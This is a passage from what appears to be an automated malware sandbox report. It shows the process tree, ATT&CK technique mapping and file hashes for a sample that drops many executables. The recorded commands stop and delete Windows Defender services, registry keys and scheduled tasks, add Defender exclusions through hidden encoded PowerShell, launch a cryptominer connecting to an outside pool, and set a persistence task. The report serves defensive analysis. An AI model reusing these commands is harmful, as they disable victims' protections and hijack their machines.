        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:1636
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:1768
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:4676
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:4544
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:3004
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:2136
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:5212
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:2376
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:5672
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:4620
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:4496
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:4876
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:5536
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:1104
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3128
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:1152
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:3636
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:1872
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:5936
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:3620
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:3020
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:4664
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:220
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:5328
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:1420
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:1732
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4936
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:4832
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 1956
        6⤵
        Program crash
        
        PID:548
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2i0393.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2i0393.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1324
- - C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
    3⤵
    PID:5908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3252
- - C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
    3⤵
    PID:5940
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe --algo rx/0 -o 196.251.118.49:49301 -u 47kJwZakUCHUPtYBwg8Hc5U3VEjqmPmKiYy8GPVQvdagRU2cTt9Fs4J34haCDRQNPdQ6oyhPQbmxP1dUp6aXVoogBCh9Dva.Worker_CPU -p x --cpu-max-threads-hint=50 -k
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:3520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe"
  2⤵
  PID:2084
- - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3244
  - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3128
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4444
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        6⤵
        Executes dropped EXE
        
        PID:3764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1032
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5672
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        9⤵
        Executes dropped EXE
        
        PID:3440
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5512
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        11⤵
        Executes dropped EXE
        
        PID:2456
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4564
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        13⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3096
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        14⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1492
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        15⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6072
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        16⤵
        Executes dropped EXE
        
        PID:2000
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        17⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2512
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        18⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2084
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        19⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5940
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:1516
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        20⤵
        Executes dropped EXE
        
        PID:1344
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        21⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5620
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        22⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        23⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5504
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        24⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3440
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        25⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:388
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        26⤵
        System Location Discovery: System Language Discovery
        
        PID:4444
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        27⤵
        System Location Discovery: System Language Discovery
        
        PID:5532
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        28⤵
        System Location Discovery: System Language Discovery
        
        PID:3336
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        29⤵
        System Location Discovery: System Language Discovery
        
        PID:1104
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        30⤵
        System Location Discovery: System Language Discovery
        
        PID:1364
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        31⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        32⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        33⤵
        
        PID:3264
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:5672
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        34⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        35⤵
        
        PID:4232
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        36⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        37⤵
        
        PID:5356
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        38⤵
        
        PID:5936
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        39⤵
        
        PID:2008
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        40⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        41⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        42⤵
        
        PID:272
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        43⤵
        
        PID:380
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        44⤵
        
        PID:3620
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        45⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        46⤵
        
        PID:2004
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        47⤵
        
        PID:1032
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        48⤵
        
        PID:892
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        48⤵
        
        PID:1496
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        49⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        50⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        51⤵
        
        PID:2740
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        52⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        53⤵
        
        PID:5232
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        54⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        55⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        56⤵
        
        PID:5364
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        57⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        58⤵
        
        PID:2992
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        59⤵
        
        PID:3684
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        60⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        61⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        62⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        63⤵
        
        PID:5528
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        64⤵
        
        PID:568
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        65⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        66⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        67⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        68⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        69⤵
        
        PID:4900
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        70⤵
        
        PID:5752
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        71⤵
        
        PID:1324
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        72⤵
        
        PID:3336
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        72⤵
        
        PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\ssvchost
  2⤵
  PID:5016

C:\Drivers\pcidrv.exe
"C:\Drivers\pcidrv.exe"
1⤵
- Executes dropped EXE
PID:4632

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBkAGQALQBtAFAAcABSAEUAZgBFAFIAZQBOAEMAZQAgAC0AZQB4AGMAbABVAFMAaQBPAE4AcABBAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBPAHIAQwBFADsAIABhAGQAZAAtAG0AUABQAHIAZQBmAGUAUgBFAE4AYwBFACAALQBFAHgAYwBsAHUAUwBpAG8AbgBwAHIATwBDAEUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACAALQBGAG8AUgBDAGUA
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544

C:\Drivers\pcidrv.exe
"C:\Drivers\pcidrv.exe"
1⤵
- Executes dropped EXE
PID:1636

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4332

C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
"C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4692
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBkAGQALQBtAHAAUAByAGUARgBFAFIAZQBOAGMARQAgAC0AZQB4AEMATABVAHMASQBPAG4AcAByAG8AQwBlAFMAUwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAGYAbwBSAEMAZQA=
1⤵
- Command and Scripting Interpreter: PowerShell
PID:2508

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4280

C:\Drivers\pcidrv.exe
"C:\Drivers\pcidrv.exe"
1⤵
- Executes dropped EXE
PID:1636

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2352

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
1⤵
- Executes dropped EXE
PID:1844

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2912

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:1160

C:\Drivers\pcidrv.exe
"C:\Drivers\pcidrv.exe"
1⤵
PID:2072

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
1⤵
PID:5296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4852 -ip 4852
1⤵
PID:2012

C:\Drivers\pcidrv.exe
"C:\Drivers\pcidrv.exe"
1⤵
PID:7048

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
1⤵
PID:7100

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
PID:7124
- C:\Users\Admin\AppData\Local\Temp\10476780101\PJsPp3e.exe
  "C:\Users\Admin\AppData\Local\Temp\10476780101\PJsPp3e.exe"
  2⤵
  PID:6072
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ssvchost" /tr "C:\Users\Admin\AppData\Roaming\ssvchost"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3492
- C:\Users\Admin\AppData\Local\Temp\10476790101\PJsPp3e.exe
  "C:\Users\Admin\AppData\Local\Temp\10476790101\PJsPp3e.exe"
  2⤵
  PID:5212
- C:\Users\Admin\AppData\Local\Temp\10476800101\d752ed8329.exe
  "C:\Users\Admin\AppData\Local\Temp\10476800101\d752ed8329.exe"
  2⤵
  PID:5568
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:3164
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Authentication Process

T1556

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Drivers\pcidrv.exe

Filesize
2.3MB

MD5
e5cb0425792ae07695337b5d36369dea

SHA1
d0b53a35d9959afc34e746faa7da663c4dc31d82

SHA256
975df998975749de47d11c12056c03f8e387f5eb7b0348937770a11158cf4382

SHA512
